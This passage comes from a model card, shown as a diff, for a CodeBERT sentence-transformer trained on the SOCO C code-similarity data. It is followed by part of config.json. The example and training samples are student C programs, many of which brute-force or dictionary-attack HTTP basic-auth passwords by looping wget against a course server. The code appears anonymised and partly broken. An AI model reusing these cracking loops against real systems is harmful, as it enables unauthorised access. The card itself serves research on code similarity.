\ {\n comb[2] = [k];\n if(execPassword(comb,url)==1)\
|
482 |
+
\ return 1;\n }\n comb[1] = '\\0';\n }\n }\n return\
|
483 |
+
\ 0;\n\n} \n\nint (char *argc, char *argv[]) {\n\n int i,j,k;\n char strin[80]\
|
484 |
+
\ = {'\\0'};\n char *passwd;\n char a[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};\n\
|
485 |
+
\ char v[4]={'\\0'};\n int startTime, stopTime, final;\n int flag=false; \n strcpy(strin,\"\
|
486 |
+
wget http://sec-crack.cs.rmit.edu./SEC/2/ --http-user= --http-passwd=\");\n\n\
|
487 |
+
\ startTime = time();\n if (bruteForce(a,v,strin)==1) {\n stopTime =\
|
488 |
+
\ time();\n final = stopTime-startTime;\n }\n\n printf (\"\\n The\
|
489 |
+
\ password is : %s\",v);\n printf(\"%lld nanoseconds (%lf) seconds \\n\"\
|
490 |
+
, final, (double)final/OneBillion );\n\n}\n"
|
491 |
+
- "\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n\
|
492 |
+
#define MAX_SIZE 255\n\n\nint (int argc, char *argv[])\n {\n FILE *fp;\n\
|
493 |
+
\ \n while(1)\n { \n system(\"wget -p http://www.cs.rmit.edu./students\"\
|
494 |
+
);\n\n\n\n system(\"mkdir data\"); \n if((fp=fopen(\"./data/index.html\"\
|
495 |
+
,\"r\"))==NULL)\n { \n system(\"cp www.cs.rmit.edu./students/index.html\
|
496 |
+
\ ./data\");\n\t \n }\n else\n { \n \n\t \n\t\
|
497 |
+
\ system(\"diff ./data/index.html www.cs.rmit.edu./students/index.html | mail\
|
498 |
+
\ @cs.rmit.edu.\");\n\t system(\"cp www.cs.rmit.edu./students/index.html ./data\"\
|
499 |
+
);\n } \n\n\n\n system(\"mkdir images\"); \n if((fp=fopen(\"\
|
500 |
+
./images/file.txt\",\"r\"))==NULL)\n { \n system(\"md5sum www.cs.rmit.edu./images/*.*\
|
501 |
+
\ > ./images/file.txt\");\n\t\t \n }\n \n else\n { \
|
502 |
+
\ \n system(\"md5sum www.cs.rmit.edu./images/*.* > www.cs.rmit.edu./file.txt\"\
|
503 |
+
);\n\t \n\t \n\t \n\t system(\"diff ./images/file.txt www.cs.rmit.edu./file.txt\
|
504 |
+
\ | mail @cs.rmit.edu.\");\n\t system(\"cp www.cs.rmit.edu./file.txt ./images\"\
|
505 |
+
);\n }\n sleep(86400); \n }\t\n return (EXIT_SUCCESS);\n }\n\
|
506 |
+
\ \n\t \n\t \t\n"
|
507 |
+
- "#include<stdio.h>\n#include<string.h>\n#include<strings.h>\n#include<stdlib.h>\n\
|
508 |
+
#include<sys/time.h>\n\n\npublic static void main()\n{\n\tint i;\n\tchar ar[100];\n\
|
509 |
+
\tFILE* f;\n\tFILE* ;\n\tsystem(\"wget -O first www.rmit.edu./students\"); \n\
|
510 |
+
\twhile(1)\n\t{\n\t\tsleep(86400);\t\n\t\tsystem(\"rm -f thed\");\n\t\tsystem(\"\
|
511 |
+
rm -f new\");\n\t\tsystem(\"wget -O new www.cs.rmit.edu./students\");\t\n\t\t\
|
512 |
+
system(\"diff new first >thed\");\t\n\t\tf=fopen(\"thed\",\"r\");\n\t\tif(fgets(ar,100,f)!=NULL)\n\
|
513 |
+
\t\t{\t\t\n\t\t\t printf(\"\\n\\n The has CHANGEDS\");\t\t\n\t\t\tsystem(\"mail\
|
514 |
+
\ @cs.rmit.edu. <thed\"); \n\t\t\tsystem(\"cp new first\");\n\t\t\tfclose(f);\n\
|
515 |
+
\t\t}\n\t\telse\n\t\t{\n\t\tfclose(f);\n\t\tprintf(\"\\n\\nthe has not changed\
|
516 |
+
\ \");\n\t\t}\n\t}\n\n}\n\n\t\n\t\n\t\n\t\t\n\n\n"
|
517 |
+
pipeline_tag: sentence-similarity
|
518 |
+
library_name: sentence-transformers
|
519 |
+
---
|
520 |
+
|
521 |
+
# SentenceTransformer based on microsoft/codebert-base
|
522 |
+
|
523 |
+
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [microsoft/codebert-base](https://huggingface.co/microsoft/codebert-base). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
|
524 |
+
|
525 |
+
## Model Details
|
526 |
+
|
527 |
+
### Model Description
|
528 |
+
- **Model Type:** Sentence Transformer
|
529 |
+
- **Base model:** [microsoft/codebert-base](https://huggingface.co/microsoft/codebert-base) <!-- at revision 3b0952feddeffad0063f274080e3c23d75e7eb39 -->
|
530 |
+
- **Maximum Sequence Length:** 512 tokens
|
531 |
+
- **Output Dimensionality:** 768 dimensions
|
532 |
+
- **Similarity Function:** Cosine Similarity
|
533 |
+
<!-- - **Training Dataset:** Unknown -->
|
534 |
+
<!-- - **Language:** Unknown -->
|
535 |
+
<!-- - **License:** Unknown -->
|
536 |
+
|
537 |
+
### Model Sources
|
538 |
+
|
539 |
+
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
|
540 |
+
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
|
541 |
+
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
|
542 |
+
|
543 |
+
### Full Model Architecture
|
544 |
+
|
545 |
+
```
|
546 |
+
SentenceTransformer(
|
547 |
+
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
|
548 |
+
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
|
549 |
+
)
|
550 |
+
```
|
551 |
+
|
552 |
+
## Usage
|
553 |
+
|
554 |
+
### Direct Usage (Sentence Transformers)
|
555 |
+
|
556 |
+
First install the Sentence Transformers library:
|
557 |
+
|
558 |
+
```bash
|
559 |
+
pip install -U sentence-transformers
|
560 |
+
```
|
561 |
+
|
562 |
+
Then you can load this model and run inference.
|
563 |
+
```python
|
564 |
+
from sentence_transformers import SentenceTransformer
|
565 |
+
|
566 |
+
# Download from the 🤗 Hub
|
567 |
+
model = SentenceTransformer("buelfhood/SOCO-C-CodeBERT-ST")
|
568 |
+
# Run inference
|
569 |
+
sentences = [
|
570 |
+
'\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\nint ()\n{\n int i,j,k,counter =0;\n char word[3];\n char paswd[3];\t\n char get[100];\n int ;\n char username[]="";\n \n \n \n \n \n\t\t\t\t\n\t\n\tfor (i = 65; i <= 122; i++)\n\t{\n\t\t if(i==91) {i=97;} \n \n\t\tfor (j = 65; j <= 122; j++)\n\t\t{\n\t\t\n\t\tif(j==91) {j=97;}\n \n\t\tfor (k = 65; k <= 122; k++)\n\t\t{\n\t\t \n\t\t\tif(k==91) {k=97;} \n\t\t\t\n\t\t\t word[0] = i;\n\t\t\t word[1] = j;\n\t\t\t word[2] = k;\n\t\t\t sprintf(paswd,"%c%c%c",word[0],word[1],word[2]); \n\t\t\t counter++;\n\t\t\tprintf("%d )%s\\n\\n", counter, paswd);\n\t\t\t sprintf(get,"wget --http-user=%s --http-passwd=%s http://sec-crack.cs.rmit.edu./SEC/2/",username,paswd);\n\t\t\t=system(get);\n\t \n\t\t\tif(==0) \n\t\t\t{\n\t\t\tprintf("The Password has been cracked and it is : %s" , paswd);\n\t\t\texit(0);\n\t\t\t}\n\t\t}\n \n\t\t}\n \n\t}\n \n\t\n}\n\n',
|
571 |
+
'\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n#define MAX_SIZE 255\n\n\nint (int argc, char *argv[])\n {\n FILE *fp;\n \n while(1)\n { \n system("wget -p http://www.cs.rmit.edu./students");\n\n\n\n system("mkdir data"); \n if((fp=fopen("./data/index.html","r"))==NULL)\n { \n system("cp www.cs.rmit.edu./students/index.html ./data");\n\t \n }\n else\n { \n \n\t \n\t system("diff ./data/index.html www.cs.rmit.edu./students/index.html | mail @cs.rmit.edu.");\n\t system("cp www.cs.rmit.edu./students/index.html ./data");\n } \n\n\n\n system("mkdir images"); \n if((fp=fopen("./images/file.txt","r"))==NULL)\n { \n system("md5sum www.cs.rmit.edu./images/*.* > ./images/file.txt");\n\t\t \n }\n \n else\n { \n system("md5sum www.cs.rmit.edu./images/*.* > www.cs.rmit.edu./file.txt");\n\t \n\t \n\t \n\t system("diff ./images/file.txt www.cs.rmit.edu./file.txt | mail @cs.rmit.edu.");\n\t system("cp www.cs.rmit.edu./file.txt ./images");\n }\n sleep(86400); \n }\t\n return (EXIT_SUCCESS);\n }\n \n\t \n\t \t\n',
|
572 |
+
'\n\n#include <stdio.h>\n#include <string.h>\n#include <sys/time.h>\n\n#define OneBillion 1e9\n#define false 0\n#define true 1\nint execPassword(char *, char *b) {\n\n\n char [100]={\'\\0\'};\n strcpy(,b);\n \n strcat(,);\n printf ("Sending command %s\\n",);\n if ( system()== 0) {\n printf ("\\n password is : %s",);\n return 1;\n }\n return 0;\n}\n \n\nint bruteForce(char [],char comb[],char *url) {\n\n\nint i,j,k;\n\n for(i=0;i<52 ;i++) {\n comb[0]= [i];\n if (execPassword(comb,url)== 1) return 1; \n for(j=0;j<52;j++) {\n comb[1] = [j];\n if(execPassword(comb,url)==1) return 1;\n for(k=0;k<52;k++) {\n comb[2] = [k];\n if(execPassword(comb,url)==1) return 1;\n }\n comb[1] = \'\\0\';\n }\n }\n return 0;\n\n} \n\nint (char *argc, char *argv[]) {\n\n int i,j,k;\n char strin[80] = {\'\\0\'};\n char *passwd;\n char a[] = {\'a\',\'b\',\'c\',\'d\',\'e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\',\'z\',\'A\',\'B\',\'C\',\'D\',\'E\',\'F\',\'G\',\'H\',\'K\',\'L\',\'M\',\'N\',\'O\',\'P\',\'Q\',\'R\',\'S\',\'T\',\'U\',\'V\',\'W\',\'X\',\'Y\',\'Z\'};\n char v[4]={\'\\0\'};\n int startTime, stopTime, final;\n int flag=false; \n strcpy(strin,"wget http://sec-crack.cs.rmit.edu./SEC/2/ --http-user= --http-passwd=");\n\n startTime = time();\n if (bruteForce(a,v,strin)==1) {\n stopTime = time();\n final = stopTime-startTime;\n }\n\n printf ("\\n The password is : %s",v);\n printf("%lld nanoseconds (%lf) seconds \\n", final, (double)final/OneBillion );\n\n}\n',
|
573 |
+
]
|
574 |
+
embeddings = model.encode(sentences)
|
575 |
+
print(embeddings.shape)
|
576 |
+
# [3, 768]
|
577 |
+
|
578 |
+
# Get the similarity scores for the embeddings
|
579 |
+
similarities = model.similarity(embeddings, embeddings)
|
580 |
+
print(similarities)
|
581 |
+
# tensor([[1.0000, 0.9892, 0.9953],
|
582 |
+
# [0.9892, 1.0000, 0.9908],
|
583 |
+
# [0.9953, 0.9908, 1.0000]])
|
584 |
+
```
|
585 |
+
|
586 |
+
<!--
|
587 |
+
### Direct Usage (Transformers)
|
588 |
+
|
589 |
+
<details><summary>Click to see the direct usage in Transformers</summary>
|
590 |
+
|
591 |
+
</details>
|
592 |
+
-->
|
593 |
+
|
594 |
+
<!--
|
595 |
+
### Downstream Usage (Sentence Transformers)
|
596 |
+
|
597 |
+
You can finetune this model on your own dataset.
|
598 |
+
|
599 |
+
<details><summary>Click to expand</summary>
|
600 |
+
|
601 |
+
</details>
|
602 |
+
-->
|
603 |
+
|
604 |
+
<!--
|
605 |
+
### Out-of-Scope Use
|
606 |
+
|
607 |
+
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
|
608 |
+
-->
|
609 |
+
|
610 |
+
<!--
|
611 |
+
## Bias, Risks and Limitations
|
612 |
+
|
613 |
+
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
|
614 |
+
-->
|
615 |
+
|
616 |
+
<!--
|
617 |
+
### Recommendations
|
618 |
+
|
619 |
+
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
|
620 |
+
-->
|
621 |
+
|
622 |
+
## Training Details
|
623 |
+
|
624 |
+
### Training Dataset
|
625 |
+
|
626 |
+
#### Unnamed Dataset
|
627 |
+
|
628 |
+
* Size: 3,081 training samples
|
629 |
+
* Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code>
|
630 |
+
* Approximate statistics based on the first 1000 samples:
|
631 |
+
| | sentence_0 | sentence_1 | label |
|
632 |
+
|:--------|:--------------------------------------------------------------------------------------|:--------------------------------------------------------------------------------------|:-----------------------------------------------|
|
633 |
+
| type | string | string | int |
|
634 |
+
| details | <ul><li>min: 194 tokens</li><li>mean: 471.57 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 194 tokens</li><li>mean: 458.65 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~99.20%</li><li>1: ~0.80%</li></ul> |
|
635 |
+
* Samples:
|
636 |
+
| sentence_0 | sentence_1 | label |
|
637 |
+
|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------|
|
638 |
+
| <code>#include <strings.h><br>#include <string.h><br>#include <ctype.h><br>#include<sys/time.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <sys/times.h><br><br><br><br>int ()<br>{<br> int i,j,k,syst;<br> char password[4],first[100],last[100];<br> int count =0; <br> char arr[52] ={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',<br> 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};<br> strcpy(first, "wget --http-user= --http-passwd=");<br> strcpy(last, " http://sec-crack.cs.rmit.edu./SEC/2/");<br> int Start_time,End_time,Total_time,average; <br> Start_time = time();<br>printf(" Time =%11dms\n", Start_time);<br> for (i=0;i<=52;i++)<br> {<br> for (j=0;j<=52;j++)<br> {<br> for(k=0;k<=52;k++)<br> {<br> password[0] = arr[i];<br> password[1] = arr[j];<br> password[2] = arr[k];<br> password[3] = '\0';<br> printf(" The Combination of the password tried %s \n" ,password);<br> printf("*...</code> | <code>#include <stdio.h><br>#include <stdlib.h><br>#include <sys/times.h><br>#include <strings.h><br>#include <string.h><br>#include <ctype.h><br><br><br><br>int ()<br>{<br> int i,j,k,sysoutput;<br> char pass[4],b[50], a[50],c[51] ,[2],string1[100],string2[100],temp1[3];<br> char arr[52] ={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',<br> 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};<br> strcpy(string1, "wget --http-user= --http-passwd=");<br> strcpy(string2, " http://sec-crack.cs.rmit.edu./SEC/2/");<br> <br> for (i=0;i<=52;i++)<br> { <br> [0] = arr[i];<br> [1] ='\0'; <br> strcpy(a,);<br> <br> printf("The first value is %s \n", a); <br><br> for (j=0;j<=52;j++)<br> { [0] = arr[j];<br> [1] = '\0'; <br> strcpy(temp1,a);<br> strcat(a,);<br> strcpy(b,a);<br> strcpy(a,temp1);<br> printf("The second value is %s \n", b); <br> for(k=0;k<=52;k++)<br> { <br> [0] =arr[k];<br> [1] = '\0...</code> | <code>1</code> |
|
639 |
+
| <code>#include<stdio.h><br>#include<string.h><br>#include<strings.h><br>#include<stdlib.h><br>#include<sys/time.h><br><br>()<br>{<br> int i,m,k,count=0;<br> FILE* diction;<br> FILE* log;<br> char s[30];<br> char pic[30];<br> char add[1000];<br> char end[100];<br> time_t ,finish;<br> double ttime;<br> <br> strcpy(add,"wget --http-user= --http-passwd=");<br> strcpy( end,"-nv -o logd http://sec-crack.cs.rmit.edu./SEC/2/");<br> diction=fopen("/usr/share/lib/dict/words","r");<br> =time(NULL);<br> while(fgets(s,100,diction)!=NULL) <br> { <br> printf("%s\n",s);<br> for(m=40,k=0;k<(strlen(s)-1);k++,m++)<br> {<br> add[m]=s[k];<br> }<br> add[m++]=' ';<br> for(i=0;i<50;i++,m++)<br> {<br> add[m]=end[i];<br> }<br> add[m]='\0';<br> <br> system(add);<br> count++;<br> log=fopen("logd","r");<br> fgets(pic,100,log);<br> printf("%s",pic);<br> if(strcmp(pic,"Authorization failed.\n")!=0) <br> {<br> finish=time(NULL);<br> ttime=difftime(,finish);<br> printf( "\n The time_var take:%f/n The of passwords tried is %d\n",ttime,count);<br> break;<br> }<br> fclose(log);<br> }<br><br>}<br></code> | <code><br><br><br><br>#include <stdio.h><br>#include <stdlib.h><br>#include <time.h><br><br>int () <br>{<br> int i,j,k,cntr=0;<br> char pass[3];<br> char password[3];<br> char get[96];<br> char username[]="";<br> int R_VALUE;<br> double time_used;<br> <br> clock_t ,end; <br> <br> =clock(); <br> <br> <br> <br> for (i = 65; i <= 122; i++)<br> {<br> if(i==91) {i=97;}<br> <br> for (j = 65; j <= 122; j++)<br> {<br> if(j==91) {j=97;}<br> <br> for (k = 65; k <= 122; k++)<br> {<br> if(k==91) {k=97;} <br> <br> pass[0] = i;<br> pass[1] = j;<br> pass[2] = k;<br> sprintf(password,"%c%c%c",pass[0],pass[1],pass[2]); <br> cntr++;<br> <br> printf("%d )%s\n\n", cntr, password);<br> sprintf(get,"wget --non-verbose --http-user=%s --http-passwd=%s http://sec-crack.cs.rmit.edu./SEC/2/",username,password);<br> <br><br> R_VALUE=system(get);<br> <br> if(R_VALUE==0) <br> {<br> printf("The Password has been cracked and it is : %s" , password);<br> ...</code> | <code>0</code> |
|
640 |
+
| <code><br><br> <br> <br><br><br>#include<stdio.h><br>#include<stdlib.h><br>#include<string.h><br><br> <br> int ()<br> {<br> char url[30];<br> int exitValue=-1;<br> FILE *fr;<br><br> char s[300]; <br> system("rm index.html*");<br> system("wget http://www.cs.rmit.edu./students/ "); <br> system("mv index.html one.html");<br> <br> printf("System completed Writing\n"); <br> system("sleep 3600");<br> <br> <br> system("wget http://www.cs.rmit.edu./students/ "); <br> <br> <br> <br> exitValue=system("diff one.html index.html > .out" );<br> <br> fr=fopen(".out","r");<br> <br> strcpy(s,"mailx -s \"Testing Again\"");<br> <br> strcat(s," < .out");<br> if(fgets(url,30,fr))<br> {<br> system(s);<br> <br> system("rm one.html"); <br> <br> printf("\nCheck your mail") ; <br> fclose(fr); <br> }<br> else<br> {<br> printf(" changes detected"); <br> <br> system("rm one.html"); <br> fc...</code> | <code>#include<stdio.h><br>#include<stdlib.h><br>#include<string.h><br>#include<ctype.h><br>#include<time.h><br><br>int ()<br>{<br><br> int m,n,o,i;<br> time_t u1,u2;<br> char v[3];<br> char temp1[100];<br> char temp2[100];<br> char temp3[250];<br> FILE *fin1;<br> <br> char point[25];<br> fin1=fopen("./words.txt","r");<br> <br> if(fin1==NULL)<br> {<br> printf(" open the file ");<br> exit(0);<br> } <br> <br><br> strcpy(temp2," --http-user= --http-passwd=");<br> strcpy(temp1,"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php");<br> <br> strcpy(temp3,"");<br> <br> (void) time(&u1); <br> <br> while(!feof(fin1)) <br> {<br> <br> fgets(point,25,fin1);<br> if(strlen(point)<=4)<br> {<br> <br> <br> strcpy(temp3,temp1);<br> strcat(temp3,temp2);<br> strcat(temp3,point);<br> printf("\nSending the %s\n",temp3);<br> i=system(temp3); <br> <br> if(i==0)<br> {<br> (void) time(&u2); <br> printf("\n The password is %s\n",point);<br> printf("\n\nThe time_var taken crack the passwork is %d second\n\n",(int)(u2-u1));<br> exit(0);<br> } <br> else<br> {<br> strcpy(temp3,"");<br> }<br> <br> <br> }<br> }<br> <br> <br>} ...</code> | <code>0</code> |
|
641 |
+
* Loss: [<code>BatchAllTripletLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#batchalltripletloss)
|
642 |
+
|
643 |
+
### Training Hyperparameters
|
644 |
+
#### Non-Default Hyperparameters
|
645 |
+
|
646 |
+
- `per_device_train_batch_size`: 16
|
647 |
+
- `per_device_eval_batch_size`: 16
|
648 |
+
- `num_train_epochs`: 1
|
649 |
+
- `fp16`: True
|
650 |
+
- `multi_dataset_batch_sampler`: round_robin
|
651 |
+
|
652 |
+
#### All Hyperparameters
|
653 |
+
<details><summary>Click to expand</summary>
|
654 |
+
|
655 |
+
- `overwrite_output_dir`: False
|
656 |
+
- `do_predict`: False
|
657 |
+
- `eval_strategy`: no
|
658 |
+
- `prediction_loss_only`: True
|
659 |
+
- `per_device_train_batch_size`: 16
|
660 |
+
- `per_device_eval_batch_size`: 16
|
661 |
+
- `per_gpu_train_batch_size`: None
|
662 |
+
- `per_gpu_eval_batch_size`: None
|
663 |
+
- `gradient_accumulation_steps`: 1
|
664 |
+
- `eval_accumulation_steps`: None
|
665 |
+
- `torch_empty_cache_steps`: None
|
666 |
+
- `learning_rate`: 5e-05
|
667 |
+
- `weight_decay`: 0.0
|
668 |
+
- `adam_beta1`: 0.9
|
669 |
+
- `adam_beta2`: 0.999
|
670 |
+
- `adam_epsilon`: 1e-08
|
671 |
+
- `max_grad_norm`: 1
|
672 |
+
- `num_train_epochs`: 1
|
673 |
+
- `max_steps`: -1
|
674 |
+
- `lr_scheduler_type`: linear
|
675 |
+
- `lr_scheduler_kwargs`: {}
|
676 |
+
- `warmup_ratio`: 0.0
|
677 |
+
- `warmup_steps`: 0
|
678 |
+
- `log_level`: passive
|
679 |
+
- `log_level_replica`: warning
|
680 |
+
- `log_on_each_node`: True
|
681 |
+
- `logging_nan_inf_filter`: True
|
682 |
+
- `save_safetensors`: True
|
683 |
+
- `save_on_each_node`: False
|
684 |
+
- `save_only_model`: False
|
685 |
+
- `restore_callback_states_from_checkpoint`: False
|
686 |
+
- `no_cuda`: False
|
687 |
+
- `use_cpu`: False
|
688 |
+
- `use_mps_device`: False
|
689 |
+
- `seed`: 42
|
690 |
+
- `data_seed`: None
|
691 |
+
- `jit_mode_eval`: False
|
692 |
+
- `use_ipex`: False
|
693 |
+
- `bf16`: False
|
694 |
+
- `fp16`: True
|
695 |
+
- `fp16_opt_level`: O1
|
696 |
+
- `half_precision_backend`: auto
|
697 |
+
- `bf16_full_eval`: False
|
698 |
+
- `fp16_full_eval`: False
|
699 |
+
- `tf32`: None
|
700 |
+
- `local_rank`: 0
|
701 |
+
- `ddp_backend`: None
|
702 |
+
- `tpu_num_cores`: None
|
703 |
+
- `tpu_metrics_debug`: False
|
704 |
+
- `debug`: []
|
705 |
+
- `dataloader_drop_last`: False
|
706 |
+
- `dataloader_num_workers`: 0
|
707 |
+
- `dataloader_prefetch_factor`: None
|
708 |
+
- `past_index`: -1
|
709 |
+
- `disable_tqdm`: False
|
710 |
+
- `remove_unused_columns`: True
|
711 |
+
- `label_names`: None
|
712 |
+
- `load_best_model_at_end`: False
|
713 |
+
- `ignore_data_skip`: False
|
714 |
+
- `fsdp`: []
|
715 |
+
- `fsdp_min_num_params`: 0
|
716 |
+
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
|
717 |
+
- `fsdp_transformer_layer_cls_to_wrap`: None
|
718 |
+
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
|
719 |
+
- `deepspeed`: None
|
720 |
+
- `label_smoothing_factor`: 0.0
|
721 |
+
- `optim`: adamw_torch
|
722 |
+
- `optim_args`: None
|
723 |
+
- `adafactor`: False
|
724 |
+
- `group_by_length`: False
|
725 |
+
- `length_column_name`: length
|
726 |
+
- `ddp_find_unused_parameters`: None
|
727 |
+
- `ddp_bucket_cap_mb`: None
|
728 |
+
- `ddp_broadcast_buffers`: False
|
729 |
+
- `dataloader_pin_memory`: True
|
730 |
+
- `dataloader_persistent_workers`: False
|
731 |
+
- `skip_memory_metrics`: True
|
732 |
+
- `use_legacy_prediction_loop`: False
|
733 |
+
- `push_to_hub`: False
|
734 |
+
- `resume_from_checkpoint`: None
|
735 |
+
- `hub_model_id`: None
|
736 |
+
- `hub_strategy`: every_save
|
737 |
+
- `hub_private_repo`: None
|
738 |
+
- `hub_always_push`: False
|
739 |
+
- `gradient_checkpointing`: False
|
740 |
+
- `gradient_checkpointing_kwargs`: None
|
741 |
+
- `include_inputs_for_metrics`: False
|
742 |
+
- `include_for_metrics`: []
|
743 |
+
- `eval_do_concat_batches`: True
|
744 |
+
- `fp16_backend`: auto
|
745 |
+
- `push_to_hub_model_id`: None
|
746 |
+
- `push_to_hub_organization`: None
|
747 |
+
- `mp_parameters`:
|
748 |
+
- `auto_find_batch_size`: False
|
749 |
+
- `full_determinism`: False
|
750 |
+
- `torchdynamo`: None
|
751 |
+
- `ray_scope`: last
|
752 |
+
- `ddp_timeout`: 1800
|
753 |
+
- `torch_compile`: False
|
754 |
+
- `torch_compile_backend`: None
|
755 |
+
- `torch_compile_mode`: None
|
756 |
+
- `include_tokens_per_second`: False
|
757 |
+
- `include_num_input_tokens_seen`: False
|
758 |
+
- `neftune_noise_alpha`: None
|
759 |
+
- `optim_target_modules`: None
|
760 |
+
- `batch_eval_metrics`: False
|
761 |
+
- `eval_on_start`: False
|
762 |
+
- `use_liger_kernel`: False
|
763 |
+
- `eval_use_gather_object`: False
|
764 |
+
- `average_tokens_across_devices`: False
|
765 |
+
- `prompts`: None
|
766 |
+
- `batch_sampler`: batch_sampler
|
767 |
+
- `multi_dataset_batch_sampler`: round_robin
|
768 |
+
- `router_mapping`: {}
|
769 |
+
- `learning_rate_mapping`: {}
|
770 |
+
|
771 |
+
</details>
|
772 |
+
|
773 |
+
### Framework Versions
|
774 |
+
- Python: 3.11.13
|
775 |
+
- Sentence Transformers: 5.0.0
|
776 |
+
- Transformers: 4.52.4
|
777 |
+
- PyTorch: 2.6.0+cu124
|
778 |
+
- Accelerate: 1.8.1
|
779 |
+
- Datasets: 3.6.0
|
780 |
+
- Tokenizers: 0.21.2
|
781 |
+
|
782 |
+
## Citation
|
783 |
+
|
784 |
+
### BibTeX
|
785 |
+
|
786 |
+
#### Sentence Transformers
|
787 |
+
```bibtex
|
788 |
+
@inproceedings{reimers-2019-sentence-bert,
|
789 |
+
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
|
790 |
+
author = "Reimers, Nils and Gurevych, Iryna",
|
791 |
+
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
|
792 |
+
month = "11",
|
793 |
+
year = "2019",
|
794 |
+
publisher = "Association for Computational Linguistics",
|
795 |
+
url = "https://arxiv.org/abs/1908.10084",
|
796 |
+
}
|
797 |
+
```
|
798 |
+
|
799 |
+
#### BatchAllTripletLoss
|
800 |
+
```bibtex
|
801 |
+
@misc{hermans2017defense,
|
802 |
+
title={In Defense of the Triplet Loss for Person Re-Identification},
|
803 |
+
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
|
804 |
+
year={2017},
|
805 |
+
eprint={1703.07737},
|
806 |
+
archivePrefix={arXiv},
|
807 |
+
primaryClass={cs.CV}
|
808 |
+
}
|
809 |
+
```
|
810 |
+
|
811 |
+
<!--
|
812 |
+
## Glossary
|
813 |
+
|
814 |
+
*Clearly define terms in order to be accessible across audiences.*
|
815 |
+
-->
|
816 |
+
|
817 |
+
<!--
|
818 |
+
## Model Card Authors
|
819 |
+
|
820 |
+
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
|
821 |
+
-->
|
822 |
+
|
823 |
+
<!--
|
824 |
+
## Model Card Contact
|
825 |
+
|
826 |
+
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
|
827 |
+
-->
|
config.json
ADDED
@@ -0,0 +1,27 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"architectures": [
|
3 |
+
"RobertaModel"
|
4 |
+
],
|
5 |
+
"attention_probs_dropout_prob": 0.1,
|
6 |
+
"bos_token_id": 0,
|
7 |
+
"classifier_dropout": null,
|
8 |
+
"eos_token_id": 2,
|
9 |
+
"hidden_act": "gelu",
|
10 |
+
"hidden_dropout_prob": 0.1,
|
11 |
+
"hidden_size": 768,
|
12 |
+
"initializer_range": 0.02,
|
13 |
+
"intermediate_size": 3072,
|
14 |
+
"layer_norm_eps": 1e-05,
|
15 |
+
"max_position_embeddings": 514,
|
16 |
+
"model_type": "roberta",
|
17 |
+
"num_attention_heads": 12,
|
18 |
+
"num_hidden_layers": 12,
|
19 |
+
"output_past": true,
|
20 |
+
"pad_token_id": 1,
|
21 |
+
